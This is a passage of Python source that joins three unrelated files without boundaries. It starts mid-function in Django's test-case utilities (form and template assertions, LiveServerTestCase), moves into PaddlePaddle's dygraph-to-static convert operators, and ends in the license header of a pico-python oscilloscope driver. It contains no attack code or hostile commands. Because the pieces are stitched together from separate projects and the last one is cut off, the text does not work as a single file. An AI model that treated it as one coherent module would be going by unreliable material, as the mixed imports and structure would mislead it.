before proceeding further. if (hasattr(response, 'render') and callable(response.render) and not response.is_rendered): response.render() if msg_prefix: msg_prefix += ": " self.assertEqual(response.status_code, status_code, msg_prefix + "Couldn't retrieve content: Response code was %d" " (expected %d)" % (response.status_code, status_code)) content = response.content if not isinstance(text, bytes) or html: text = force_text(text, encoding=response._charset) content = content.decode(response._charset) text_repr = "'%s'" % text else: text_repr = repr(text) if html: content = assert_and_parse_html(self, content, None, 'Response\'s content is not valid HTML:') text = assert_and_parse_html(self, text, None, 'Second argument is not valid HTML:') self.assertEqual(content.count(text), 0, msg_prefix + "Response should not contain %s" % text_repr) def assertFormError(self, response, form, field, errors, msg_prefix=''): """ Asserts that a form used to render the response has a specific field error. """ if msg_prefix: msg_prefix += ": " # Put context(s) into a list to simplify processing. contexts = to_list(response.context) if not contexts: self.fail(msg_prefix + "Response did not use any contexts to " "render the response") # Put error(s) into a list to simplify processing. errors = to_list(errors) # Search all contexts for the error. 
found_form = False for i,context in enumerate(contexts): if form not in context: continue found_form = True for err in errors: if field: if field in context[form].errors: field_errors = context[form].errors[field] self.assertTrue(err in field_errors, msg_prefix + "The field '%s' on form '%s' in" " context %d does not contain the error '%s'" " (actual errors: %s)" % (field, form, i, err, repr(field_errors))) elif field in context[form].fields: self.fail(msg_prefix + "The field '%s' on form '%s'" " in context %d contains no errors" % (field, form, i)) else: self.fail(msg_prefix + "The form '%s' in context %d" " does not contain the field '%s'" % (form, i, field)) else: non_field_errors = context[form].non_field_errors() self.assertTrue(err in non_field_errors, msg_prefix + "The form '%s' in context %d does not" " contain the non-field error '%s'" " (actual errors: %s)" % (form, i, err, non_field_errors)) if not found_form: self.fail(msg_prefix + "The form '%s' was not used to render the" " response" % form) def assertTemplateUsed(self, response=None, template_name=None, msg_prefix=''): """ Asserts that the template with the provided name was used in rendering the response. Also usable as context manager. """ if response is None and template_name is None: raise TypeError('response and/or template_name argument must be provided') if msg_prefix: msg_prefix += ": " # Use assertTemplateUsed as context manager. if not hasattr(response, 'templates') or (response is None and template_name): if response: template_name = response response = None context = _AssertTemplateUsedContext(self, template_name) return context template_names = [t.name for t in response.templates] if not template_names: self.fail(msg_prefix + "No templates used to render the response") self.assertTrue(template_name in template_names, msg_prefix + "Template '%s' was not a template used to render" " the response. Actual template(s) used: %s" % (template_name, ', '.join(template_names))) def assertTemplateNotUsed(self, response=None, template_name=None, msg_prefix=''): """ Asserts that the template with the provided name was NOT used in rendering the response. Also usable as context manager. """ if response is None and template_name is None: raise TypeError('response and/or template_name argument must be provided') if msg_prefix: msg_prefix += ": " # Use assertTemplateUsed as context manager. if not hasattr(response, 'templates') or (response is None and template_name): if response: template_name = response response = None context = _AssertTemplateNotUsedContext(self, template_name) return context template_names = [t.name for t in response.templates] self.assertFalse(template_name in template_names, msg_prefix + "Template '%s' was used unexpectedly in rendering" " the response" % template_name) def assertQuerysetEqual(self, qs, values, transform=repr, ordered=True): items = six.moves.map(transform, qs) if not ordered: return self.assertEqual(set(items), set(values)) values = list(values) # For example qs.iterator() could be passed as qs, but it does not # have 'ordered' attribute. 
if len(values) > 1 and hasattr(qs, 'ordered') and not qs.ordered: raise ValueError("Trying to compare non-ordered queryset " "against more than one ordered values") return self.assertEqual(list(items), values) def assertNumQueries(self, num, func=None, *args, **kwargs): using = kwargs.pop("using", DEFAULT_DB_ALIAS) conn = connections[using] context = _AssertNumQueriesContext(self, num, conn) if func is None: return context with context: func(*args, **kwargs) def connections_support_transactions(): """ Returns True if all connections support transactions. """ return all(conn.features.supports_transactions for conn in connections.all()) class TestCase(TransactionTestCase): """ Does basically the same as TransactionTestCase, but surrounds every test with a transaction, monkey-patches the real transaction management routines to do nothing, and rollsback the test transaction at the end of the test. You have to use TransactionTestCase, if you need transaction management inside a test. """ def _fixture_setup(self): if not connections_support_transactions(): return super(TestCase, self)._fixture_setup() assert not self.reset_sequences, 'reset_sequences cannot be used on TestCase instances' self.atomics = {} for db_name in self._databases_names(): self.atomics[db_name] = transaction.atomic(using=db_name) self.atomics[db_name].__enter__() # Remove this when the legacy transaction management goes away. disable_transaction_methods() for db in self._databases_names(include_mirrors=False): if hasattr(self, 'fixtures'): call_command('loaddata', *self.fixtures, **{ 'verbosity': 0, 'commit': False, 'database': db, 'skip_validation': True, }) def _fixture_teardown(self): if not connections_support_transactions(): return super(TestCase, self)._fixture_teardown() # Remove this when the legacy transaction management goes away. restore_transaction_methods() for db_name in reversed(self._databases_names()): # Hack to force a rollback connections[db_name].needs_rollback = True self.atomics[db_name].__exit__(None, None, None) def _deferredSkip(condition, reason): def decorator(test_func): if not (isinstance(test_func, type) and issubclass(test_func, TestCase)): @wraps(test_func) def skip_wrapper(*args, **kwargs): if condition(): raise ut2.SkipTest(reason) return test_func(*args, **kwargs) test_item = skip_wrapper else: test_item = test_func test_item.__unittest_skip_why__ = reason return test_item return decorator def skipIfDBFeature(feature): """ Skip a test if a database has the named feature """ return _deferredSkip(lambda: getattr(connection.features, feature), "Database has feature %s" % feature) def skipUnlessDBFeature(feature): """ Skip a test unless a database has the named feature """ return _deferredSkip(lambda: not getattr(connection.features, feature), "Database doesn't support feature %s" % feature) class QuietWSGIRequestHandler(WSGIRequestHandler): """ Just a regular WSGIRequestHandler except it doesn't log to the standard output any of the requests received, so as to not clutter the output for the tests' results. """ def log_message(*args): pass if sys.version_info >= (3, 3, 0): _ImprovedEvent = threading.Event elif sys.version_info >= (2, 7, 0): _ImprovedEvent = threading._Event else: class _ImprovedEvent(threading._Event): """ Does the same as `threading.Event` except it overrides the wait() method with some code borrowed from Python 2.7 to return the set state of the event (see: http://hg.python.org/cpython/rev/b5aa8aa78c0f/). 
This allows to know whether the wait() method exited normally or because of the timeout. This class can be removed when Django supports only Python >= 2.7. """ def wait(self, timeout=None): self._Event__cond.acquire() try: if not self._Event__flag: self._Event__cond.wait(timeout) return self._Event__flag finally: self._Event__cond.release() class StoppableWSGIServer(WSGIServer): """ The code in this class is borrowed from the `SocketServer.BaseServer` class in Python 2.6. The important functionality here is that the server is non- blocking and that it can be shut down at any moment. This is made possible by the server regularly polling the socket and checking if it has been asked to stop. Note for the future: Once Django stops supporting Python 2.6, this class can be removed as `WSGIServer` will have this ability to shutdown on demand and will not require the use of the _ImprovedEvent class whose code is borrowed from Python 2.7. """ def __init__(self, *args, **kwargs): super(StoppableWSGIServer, self).__init__(*args, **kwargs) self.__is_shut_down = _ImprovedEvent() self.__serving = False def serve_forever(self, poll_interval=0.5): """ Handle one request at a time until shutdown. Polls for shutdown every poll_interval seconds. """ self.__serving = True self.__is_shut_down.clear() while self.__serving: r, w, e = select.select([self], [], [], poll_interval) if r: self._handle_request_noblock() self.__is_shut_down.set() def shutdown(self): """ Stops the serve_forever loop. Blocks until the loop has finished. This must be called while serve_forever() is running in another thread, or it will deadlock. """ self.__serving = False if not self.__is_shut_down.wait(2): raise RuntimeError( "Failed to shutdown the live test server in 2 seconds. The " "server might be stuck or generating a slow response.") def handle_request(self): """Handle one request, possibly blocking. """ fd_sets = select.select([self], [], [], None) if not fd_sets[0]: return self._handle_request_noblock() def _handle_request_noblock(self): """ Handle one request, without blocking. I assume that select.select has returned that the socket is readable before this function was called, so there should be no risk of blocking in get_request(). """ try: request, client_address = self.get_request() except socket.error: return if self.verify_request(request, client_address): try: self.process_request(request, client_address) except Exception: self.handle_error(request, client_address) self.close_request(request) class _MediaFilesHandler(StaticFilesHandler): """ Handler for serving the media files. This is a private class that is meant to be used solely as a convenience by LiveServerThread. """ def get_base_dir(self): return settings.MEDIA_ROOT def get_base_url(self): return settings.MEDIA_URL def serve(self, request): relative_url = request.path[len(self.base_url[2]):] return serve(request, relative_url, document_root=self.get_base_dir()) class LiveServerThread(threading.Thread): """ Thread for running a live http server while the tests are running. """ def __init__(self, host, possible_ports, connections_override=None): self.host = host self.port = None self.possible_ports = possible_ports self.is_ready = threading.Event() self.error = None self.connections_override = connections_override super(LiveServerThread, self).__init__() def run(self): """ Sets up the live server and databases, and then loops over handling http requests. 
""" if self.connections_override: # Override this thread's database connections with the ones # provided by the main thread. for alias, conn in self.connections_override.items(): connections[alias] = conn try: # Create the handler for serving static and media files handler = StaticFilesHandler(_MediaFilesHandler(WSGIHandler())) # Go through the list of possible ports, hoping that we can find # one that is free to use for the WSGI server. for index, port in enumerate(self.possible_ports): try: self.httpd = StoppableWSGIServer( (self.host, port), QuietWSGIRequestHandler) except WSGIServerException as e: if (index + 1 < len(self.possible_ports) and hasattr(e.args[0], 'errno') and e.args[0].errno == errno.EADDRINUSE): # This port is already in use, so we go on and try with # the next one in the list. continue else: # Either none of the given ports are free or the error # is something else than "Address already in use". So # we let that error bubble up to the main thread. raise else: # A free port was found. self.port = port break self.httpd.set_app(handler) self.is_ready.set() self.httpd.serve_forever() except Exception as e: self.error = e self.is_ready.set() def join(self, timeout=None): if hasattr(self, 'httpd'): # Stop the WSGI server self.httpd.shutdown() self.httpd.server_close() super(LiveServerThread, self).join(timeout) class LiveServerTestCase(TransactionTestCase): """ Does basically the same as TransactionTestCase but also launches a live http server in a separate thread so that the tests may use another testing framework, such as Selenium for example, instead of the built-in dummy client. Note that it inherits from TransactionTestCase instead of TestCase because the threads do not share the same transactions (unless if using in-memory sqlite) and each thread needs to commit all their transactions so that the other thread can see the changes. """ @property def live_server_url(self): return 'http://%s:%s' % ( self.server_thread.host, self.server_thread.port) @classmethod def setUpClass(cls): connections_override = {} for conn in connections.all(): # If using in-memory sqlite databases, pass the connections to # the server thread. if (conn.settings_dict['ENGINE'].rsplit('.', 1)[-1] in ('sqlite3', 'spatialite') and conn.settings_dict['NAME'] == ':memory:'): # Explicitly enable thread-shareability for this connection conn.allow_thread_sharing = True connections_override[conn.alias] = conn # Launch the live server's thread specified_address = os.environ.get( 'DJANGO_LIVE_TEST_SERVER_ADDRESS', 'localhost:8081') # The specified ports may be of the form '8000-8010,8080,9200-9300' # i.e. a comma-separated list of ports or ranges of ports, so we break # it down into a detailed list of all possible ports. possible_ports = [] try: host, port_ranges = specified_address.split(':') for port_range in port_ranges.split(','): # A port range can be of either form: '8000' or '8000-8010'. extremes = list(map(int, port_range.split('-'))) assert len(extremes) in [1, 2] if len(extremes) == 1: # Port range of the form '8000' possible_ports.append(extremes[0]) else: # Port range of the form '8000-8010' for port in range(extremes[0], extremes[1] + 1): possible_ports.append(port) except Exception: msg = 'Invalid address ("%s") for live server.' 
% specified_address six.reraise(ImproperlyConfigured, ImproperlyConfigured(msg), sys.exc_info()[2]) cls.server_thread = LiveServerThread( host, possible_ports, connections_override) cls.server_thread.daemon = True cls.server_thread.start() # Wait for the live server to be ready cls.server_thread.is_ready.wait() if cls.server_thread.error: raise cls.server_thread.error super(LiveServerTestCase, cls).setUpClass() @classmethod def tearDownClass(cls): # There may not be a 'server_thread' attribute if setUpClass() for some # reasons has raised an exception. if hasattr(cls, 'server_thread'): # Terminate the live server's thread cls.server_thread.join() # Restore sqlite connections' non-sharability for conn in connections.all(): if (conn.settings_dict['ENGINE'].rsplit('.', 1)[-1] in ('sqlite3', 'spatialite') and conn.settings_dict['NAME'] == ':memory:'): conn.allow_thread_sharing = False super(LiveServerTestCase, cls).tearDownClass()
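# ---------------------------------------------------------------------------
# A stand-alone sketch of the address parsing performed inside
# LiveServerTestCase.setUpClass() above. The accepted format is the one
# documented there: "host:ports" where the ports part is a comma-separated
# list of single ports and/or "low-high" ranges, e.g. "localhost:8000-8010,8080".
# The function name is illustrative, not part of Django's API.
def _parse_live_server_address(specified_address):
    host, port_ranges = specified_address.split(':')
    possible_ports = []
    for port_range in port_ranges.split(','):
        # A port range can be of either form: '8000' or '8000-8010'.
        extremes = list(map(int, port_range.split('-')))
        assert len(extremes) in [1, 2]
        if len(extremes) == 1:
            # Single port, e.g. '8080'.
            possible_ports.append(extremes[0])
        else:
            # Inclusive range, e.g. '8000-8010'.
            possible_ports.extend(range(extremes[0], extremes[1] + 1))
    return host, possible_ports

# Example:
#   host, ports = _parse_live_server_address('localhost:8000-8010,8080')
#   -> ('localhost', [8000, 8001, ..., 8010, 8080])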
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from paddle.fluid.data_feeder import convert_dtype from paddle.fluid.dygraph.dygraph_to_static.variable_trans_func import to_static_variable from paddle.fluid.framework import core, Variable from paddle.fluid.layers import Assert, Print from paddle.fluid.layers import array_length, array_read, array_write, create_array from paddle.fluid.layers import assign, fill_constant, slice, reduce_all, reduce_any from paddle.fluid.layers import cast, control_flow, logical_and, logical_not, logical_or, nn from paddle.fluid.layers.control_flow import cond, while_loop, less_than, increment from paddle.fluid.dygraph.dygraph_to_static.return_transformer import RETURN_NO_VALUE_VAR_NAME def convert_while_loop(cond, body, loop_vars): """ A function representation of a Python ``while`` statement. Args: cond(Callable): A callable object that returns a boolean variable to control whether to execute the loop body. It takes ``loop_vars`` as arguments. body(Callable): A callable object that returns a tuple or list of variables with the same arguments ``loops_vars`` as ``cond`` . loop_vars(list|tuple): A list or tuple of variables passed to ``cond`` and ``body`` . Returns: A list or tuple of variables which returned by ``body``. """ # NOTE: It may be slower if cond is very expensive, but usually cond is just O(1). # If loop_vars is changed during cond callable, then it causes bug, but current logical_and/logical_not/... doesn't change the loop_vars. pred = cond(*loop_vars) if isinstance(pred, Variable): loop_vars = _run_paddle_while_loop(cond, body, loop_vars) else: loop_vars = _run_py_while(cond, body, loop_vars) return loop_vars def _run_paddle_while_loop(cond, body, loop_vars): # NOTE: loop_vars of Paddle op `control_flow.while_loop` must be Paddle Tensors. loop_vars = [to_static_variable(var) for var in loop_vars] loop_vars = control_flow.while_loop(cond, body, loop_vars) return loop_vars def _run_py_while(cond, body, loop_vars): while cond(*loop_vars): loop_vars = body(*loop_vars) return loop_vars def convert_logical_and(x_func, y_func): """ A function representation of a Python ``and`` statement. Args: x_func(callable): x_func() is the left hand operand of ``and`` operator. x_func() is bool or Tensor. y_func(callable): y_func() is the right hand operand of ``and`` operator. y_func() is bool or Tensor. Returns: A python bool variable or a bool Tensor. NOTE(liym27): 1) The operands are executed sequentially according to the running logic of Python. So here the arguments should be callable. 2) If the left hand operand is False, the right hand operand should be executed. For example: a = x > 1 and y < 1 Transformed code: a = paddle.jit.dy2static.convert_logical_and(lambda:x>1, lambda:y<1) In `convert_logical_and(lambda:x>1, lambda:y<1)`, `lambda:y<1` must be run after `lambda:x>1`. And if `x>1` is False, `y<1` should NOT be run. 
""" x_value = x_func() if not isinstance(x_value, Variable): return _run_py_logical_and(lambda: x_value, y_func) y_value = y_func() if not isinstance(y_value, Variable): return _run_py_logical_and(lambda: y_value, lambda: x_value) return _run_paddle_logical_and(x_value, y_value) def _run_paddle_logical_and(x, y): x = cast_bool_if_necessary(x) y = cast_bool_if_necessary(y) return logical_and(x, y) def _run_py_logical_and(x_func, y_func): x_value = x_func() assert not isinstance(x_value, Variable) # NOTE(liym27): # 1. Returns y_func() if x_value is False; # 2. If x_value is False, y_func() should not be run. return x_value and y_func() def convert_logical_or(x_func, y_func): """ A function representation of a Python ``or`` statement. Args: x_func(callable): x_func() is the left hand operand of ``or`` operator. x_func() is bool or Tensor. y_func(callable): y_func() is the right hand operand of ``or`` operator. y_func() is bool or Tensor. Returns: A python bool variable or a bool Tensor. NOTE(liym27): 1) The operands are executed sequentially according to the running logic of Python. So here the arguments should be callable. 2) If the left hand operand is True, the right hand operand should be executed. For example: a = x > 1 or y < 1 Transformed code: a = paddle.jit.dy2static.convert_logical_or(lambda:x>1, lambda:y<1) In `convert_logical_or(lambda:x>1, lambda:y<1)`, `lambda:y<1` must be run after `lambda:x>1`. And if `x>1` is True, `y<1` should NOT be run. """ x_value = x_func() if not isinstance(x_value, Variable): return _run_py_logical_or(lambda: x_value, y_func) y_value = y_func() if not isinstance(y_value, Variable): return _run_py_logical_or(lambda: y_value, lambda: x_value) return _run_paddle_logical_or(x_value, y_value) def _run_paddle_logical_or(x, y): x = cast_bool_if_necessary(x) y = cast_bool_if_necessary(y) return logical_or(x, y) def _run_py_logical_or(x_func, y_func): x_value = x_func() assert not isinstance(x_value, Variable) # NOTE(liym27): # 1. Returns y_func() if x_value is False; # 2. If x_value is True, y_func() should not be run. return x_value or y_func() def convert_logical_not(x): """ A function representation of a Python ``not`` statement. Args: x(bool|Tensor): Operand of of ``not`` operator. Returns: A python bool variable or a bool Tensor. """ if isinstance(x, Variable): return _run_paddle_logical_not(x) else: return _run_py_logical_not(x) def _run_paddle_logical_not(x): x = cast_bool_if_necessary(x) return logical_not(x) def _run_py_logical_not(x): return not x def convert_ifelse(pred, true_fn, false_fn, true_args, false_args, return_vars): """ A function representation of a Python ``if/else`` statement. Args: pred(bool|Tensor): A boolean Tensor which determines whether to return the result of ``true_fn`` or ``false_fn`` . true_fn(callable): A callable to be performed if ``pred`` is true. false_fn(callable): A callable to be performed if ``pred`` is false. true_args(tuple): Parameters of ``true_fn``. false_args(tuple): Parameters of ``false_fn``. return_vars(tuple): Return variables of ``true_fn`` and ``false_fn``. Returns: ``true_fn(true_args)`` if the predicate ``pred`` is true else ``false_fn(false_args)`` . 
""" if isinstance(pred, Variable): out = _run_paddle_cond(pred, true_fn, false_fn, true_args, false_args, return_vars) else: out = _run_py_ifelse(pred, true_fn, false_fn, true_args, false_args) return _remove_no_value_return_var(out) def _remove_no_value_return_var(out): if isinstance(out, tuple) and len(out) > 0: processed_out = out align_ret = out[0] if isinstance(align_ret, tuple): for index, item in enumerate(align_ret): if isinstance(item, Variable) and ( RETURN_NO_VALUE_VAR_NAME in item.name): # return None if index == 0: processed_out = (None, ) + out[1:] elif index == 1: processed_out = align_ret[:1] + out[1:] else: processed_out = (align_ret[:index], ) + out[1:] break for index, item in enumerate(processed_out): if isinstance(item, Variable) and ( RETURN_NO_VALUE_VAR_NAME in item.name): processed_out = processed_out[:index] if not processed_out: return None elif len(processed_out) == 1: return processed_out[0] else: return processed_out else: return out def _run_paddle_cond(pred, true_fn, false_fn, true_args, false_args, return_vars): pred = cast_bool_if_necessary(pred) return control_flow.cond(pred, lambda: true_fn(*true_args), lambda: false_fn(*false_args)) def _run_py_ifelse(pred, true_fn, false_fn, true_args, false_args): return true_fn(*true_args) if pred else false_fn(*false_args) def convert_len(var): """ Returns variable(length) from shape ops based on var.type Note: In addition to some ast transformations, some block-related operations are added in `len` transformation, such as appending `shape_op` in var.block. """ if isinstance(var, Variable): if var.type in [ core.VarDesc.VarType.LOD_TENSOR, core.VarDesc.VarType.SELECTED_ROWS ]: # Note: Length of var may be known ahead of time in dygraph, # but it probably represents batch size which can be variant. # so we return a variable dynamically inferred from var.shape. return nn.shape(var)[0] elif var.type == core.VarDesc.VarType.LOD_TENSOR_ARRAY: return control_flow.array_length(var) else: raise TypeError( 'len(var) only supports LoDTensor/LoDTensorArray/SelectedRows, but received %s.' % type(var)) else: return len(var) def convert_zip(*args): for i, arg in enumerate(args): if isinstance(arg, Variable) and arg.shape[0] == -1: raise RuntimeError( "Not support zip(tensor, ...) when tensor.shape[0] == -1, " "but found args[{}].shape[0] == -1 in 'zip'".format(str(i))) return zip(*args) def convert_var_shape(x, idx=None, in_control_flow=False): """ A function representation of the shape of variable. """ def has_negative(list_shape, idx=None): if idx is not None: return list_shape[idx] < 0 num_negative = sum([1 if i < 0 else 0 for i in list_shape]) return num_negative > 0 # When `x` is Variable, call nn.shape(x) in following cases: # (1) The shape of `x` is used in control flow condition. # ``` # if x.shape[0] == 1: # y = XX # ``` # (2) The dim to be used is negative # ``` # # Assume x.shape=[3, -1] in static mode # y = paddle.reshape(x, shape=[1, x.shape[1]]) # ``` if isinstance(x, Variable) and (in_control_flow or has_negative(x.shape, idx)): return nn.shape(x) if idx is None else nn.shape(x)[idx] else: return x.shape if idx is None else x.shape[idx] def convert_var_shape_simple(x): """ A function representation of the shape of variable. """ if isinstance(x, Variable): return nn.shape(x) else: return x.shape def eval_if_exist_else_none(name, global_symbol_table): """ Args: name([str]): Expression passed into `eval`. local_symbol_table(dict): Specified from `globals()`. 
DO NOT use `locals()`, because all STATIC_CONVERT_VAR_SHAPE_SUFFIX vars is declared with keyword `global`. Returns: Return the variable if found in global_symbol_table else None. """ try: return eval(name, global_symbol_table) except: return None def choose_shape_attr_or_api(attr_shape, api_shape, idx=None): """ Input can be attribute `x.shape` or api `shape(x)`, this function chooses which one to return to use in dy2stat. Note: sometimes users write `x.shape[3]`, so attr_shape can be an integer. """ if api_shape is None: return attr_shape if idx is None else attr_shape[idx] if not isinstance(attr_shape, (list, tuple)): # some variables like x.shape[0] is no longer a list or tuple if isinstance(attr_shape, int) and attr_shape < 0: return api_shape if idx is None else api_shape[idx] return attr_shape if idx is None else attr_shape[idx] def has_negative(list_shape, idx=None): if idx is not None: return list_shape[idx] < 0 num_negative = sum([1 if i < 0 else 0 for i in list_shape]) return num_negative > 0 if has_negative(attr_shape, idx): return api_shape if idx is None else api_shape[idx] return attr_shape if idx is None else attr_shape[idx] def convert_shape_compare(left, *args): """ A function handles comparison difference between Paddle and Python. For example, if x and y are Tensors, x.shape == y.shape will return single boolean Value (True/False). However, paddle.shape(x) == paddle.shape(y) is an element-wise comparison. The difference can cause dy2stat error. So we create this function to handle the difference. Args: left: variable *args: compare_op(str), variable, compare_op(str), variable, where compare_op means "<", ">", "==", "!=", etc. Returns: If the variables to compare are NOT Paddle Variables, we will return as Python like "a op1 b and b op2 c and ... ". If the variables to compare are Paddle Variables, we will do elementwise comparsion first and then reduce to a boolean whose numel is 1. """ args_len = len(args) assert args_len >= 2, "convert_shape_compare needs at least one right compare variable" assert args_len % 2 == 0, "Illegal input for convert_shape_compare, *args should be op(str), var, op(str), var ..." 
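    # `args` alternates operators and operands: (op1, var1, op2, var2, ...).
    # For example, the chained comparison `x < y <= z` arrives here as
    # convert_shape_compare(x, "<", y, "<=", z).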
num_cmp = args_len // 2 if isinstance(left, Variable): def reduce_compare(x, op_str, y): element_wise_result = eval("x " + op_str + " y") if op_str == "!=": return reduce_any(element_wise_result) elif op_str == "is" or op_str == "is not" or op_str == "in" or op_str == "not in": return element_wise_result else: return reduce_all(element_wise_result) final_result = reduce_compare(left, args[0], args[1]) for i in range(1, num_cmp): cmp_left = args[i * 2 - 1] cmp_op = args[i * 2] cmp_right = args[i * 2 + 1] cur_result = reduce_compare(cmp_left, cmp_op, cmp_right) final_result = convert_logical_and(lambda: final_result, lambda: cur_result) return final_result else: cmp_left = left final_result = None for i in range(num_cmp): cmp_op = args[i * 2] cmp_right = args[i * 2 + 1] cur_result = eval("cmp_left " + cmp_op + " cmp_right") if final_result is None: final_result = cur_result else: final_result = final_result and cur_result if final_result is False: return False cmp_left = cmp_right return final_result def cast_bool_if_necessary(var): assert isinstance(var, Variable) if convert_dtype(var.dtype) not in ['bool']: var = cast(var, dtype="bool") return var def convert_var_dtype(var, dtype): if isinstance(var, Variable): src_dtype = convert_dtype(var.dtype) assert src_dtype in [ 'bool', 'float16', 'float32', 'float64', 'int32', 'int64', 'uint8' ], "The dtype of var {} is {}, which is not supported in the cast op.".format( var.name, src_dtype) assert dtype in [ 'bool', 'int', 'float' ], "The casted target dtype is {}, which is not supported in type casting.".format( dtype) cast_map = { 'bool': 'bool', 'int': 'int32', 'float': 'float32', } return cast(var, dtype=cast_map[dtype]) else: return eval('{}(var)'.format(dtype)) def convert_assert(cond, message=""): """ A function representation of a Python ``assert`` statement. """ if isinstance(cond, Variable): cond = cast(cond, "bool") # NOTE: message is not used because Paddle Assert has no corresponding parameter to use. return Assert(cond) else: assert cond, message def convert_print(*args): """ A function representing Python ``print`` statement. Note: this is a basic python function so we haven't handle sep, end, file and flush parameters of python function. """ for var in args: if isinstance(var, Variable): var = Print(var) else: print(var) def convert_pop(target, *args): """ A function representation of a Python pop statement for a list or dict. Args: target(list|dict|Tensor): A variable to pop item from. *args(tuple): index or default value to parse. Returns: A item poped from target. """ is_variable = isinstance(target, Variable) if is_variable: is_tensor_array = target.type == core.VarDesc.VarType.LOD_TENSOR_ARRAY if is_variable and is_tensor_array: return _run_paddle_pop(target, *args) else: return _run_python_pop(target, *args) def _run_paddle_pop(array, *args): if len(args) == 0: idx = -1 else: idx = args[0] assert isinstance(idx, int) def cond(i, new_array): return less_than(i, arr_len) def body(i, new_array): item = array_read(array=array, i=i) array_write(item, array_length(new_array), new_array) i = increment(i) return i, new_array arr_len = array_length(array) if idx < 0: idx = idx + arr_len else: idx = fill_constant(shape=[1], dtype="int64", value=idx) pop_item = array_read(array, idx) new_array = _slice_tensor_array(array, 0, idx) i = idx + 1 _, new_array = while_loop(cond, body, [i, new_array]) assign(input=new_array, output=array) return pop_item # TODO(liym27): A better way to slice tensor array. 
# Maybe support start == end for slice op.
def _slice_tensor_array(array, start, end):
    # Returns array[start:end] (along axis 0) as a new tensor array; when
    # start == end an empty float32 array is returned instead, since the
    # slice op does not handle that case yet (see the TODO above).
    def true_fn():
        null_array = create_array("float32")
        return null_array

    def false_fn(array, start, end):
        new_array = slice(array, starts=[start], ends=[end], axes=[0])
        return new_array

    new_array = cond(start == end, true_fn, lambda: false_fn(array, start, end))
    return new_array


def _run_python_pop(target, *args):
    # 1. dict.pop(key, default): two arguments always means a dict pop with a
    #    default value.
    if len(args) == 2:
        idx, default = args
        return target.pop(idx, default)

    # 2. list.pop(index) or dict.pop(key) without a default; a list pops its
    #    last element when no index is given.
    else:
        idx = args[0] if args else -1
        return target.pop(idx)
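# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the Paddle module above): it mirrors only
# the pure-Python fall-back paths (`_run_py_logical_and`, `_run_py_ifelse`)
# to show why the dy2stat rewrite wraps operands in callables: evaluation
# order and short-circuiting must match plain Python. The `demo_*` names are
# hypothetical stand-ins, not Paddle APIs, so the snippet runs without Paddle.
if __name__ == '__main__':

    def demo_convert_logical_and(x_func, y_func):
        # Same contract as the bool branch above: y_func() only runs when
        # x_func() is truthy.
        x_value = x_func()
        return x_value and y_func()

    def demo_convert_ifelse(pred, true_fn, false_fn, true_args, false_args):
        # Same contract as _run_py_ifelse for plain Python predicates.
        return true_fn(*true_args) if pred else false_fn(*false_args)

    calls = []

    def left():
        calls.append('left')
        return False

    def right():
        calls.append('right')
        return True

    # `a = left() and right()` is rewritten into a call taking callables; the
    # right-hand side must NOT run when the left-hand side is False.
    assert demo_convert_logical_and(left, right) is False
    assert calls == ['left']

    # `x if pred else y` keeps only the selected branch's side effects.
    assert demo_convert_ifelse(3 > 1, lambda v: v * 2, lambda v: v, (5,), (0,)) == 10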
# This is the instrument-specific file for the PS3000a series of instruments. # # pico-python is Copyright (c) 2013-2014 By: # Colin O'Flynn <coflynn@newae.com> # Mark Harfouche <mark.harfouche@gmail.com> # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """ This is the low level driver file for a specific Picoscope. By this, I mean if parameters want to get passed as strings, they should be handled by PSBase All functions here should take things as close to integers as possible, the only exception here is for array parameters. Array parameters should be passed in a pythonic way through numpy since the PSBase class should not be aware of the specifics behind how the clib is called. The functions should not have any default values as these should be handled by PSBase. 
